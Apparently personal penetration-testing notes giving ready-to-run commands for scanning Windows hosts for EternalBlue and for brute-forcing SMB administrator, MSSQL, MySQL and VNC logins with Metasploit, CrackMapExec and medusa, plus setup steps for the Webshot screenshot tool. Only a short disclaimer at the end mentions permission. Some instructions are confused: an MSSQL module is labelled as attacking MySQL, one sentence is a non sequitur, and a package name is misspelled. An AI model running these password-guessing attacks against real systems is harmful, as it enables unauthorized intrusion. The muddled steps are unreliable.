12/18/2024

Windows 7 and Windows Server 2008 R2 are vulnerable to the Eternal Blue exploit. Use the following command in Metasploit:

bash
use auxiliary/scanner/smb/smb_ms17_010
set rhosts file:/home/we6jbo/windows.txt
run

The string "Professional 7601 Service Pack 1 x64" is a potential indicator of an Eternal Blue vulnerability.
To try a variety of passwords, use this command:

bash
cme smb discovery/hosts/windows.txt --local-auth -u Administrator -p passwords.txt

To attack a MySQL server, use the following command:

bash
use auxiliary/scanner/mssql/mssql_login
set username sa
set pass_file /home/we6jbo/password.txt
set rhosts file:/home/we6jbo/mssql.txt
run

If you get the error "Unsupported target", try this alternative command:

bash
medusa -M mysql -H discovery/hosts/mysql.txt -u root -P password.txt

This confirms if the IP is blocked. Brute-forcing VNC can be achieved using the following command:

bash
use auxiliary/scanner/vnc/vnc_login
set rhosts file:/home/we6jbo/vnc.txt
set pass_file /home/we6jbo/passwords.txt
run

WAR Files:
WAR stands for Web Application Archive, often used with Apache Tomcat.

Webshot Tool:
Webshot uses an XML file to take screenshots of websites. To set it up:

bash
git clone https://github.com/R3dy/webshot.git
cd webshot
bundle install
gem install thread
wget http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.54-lubuntu1.1_amd64.deb
sudo dpkg -i libpng12-0_1.2.54-lubuntu1.1_amd64.deb

To run Webshot:

bash
./webshot.rb -h
~/git/webshot/webshot.rb -t discovery/services/web.xml -o documentation/screenshots

information is for educational purposes only and should only be used in environments where you have explicit permission

Please be responsible and focus on securing systems and understanding vulnerabilities rather than exploiting them maliciously
Using these techniques without authorization is illegal and unethical.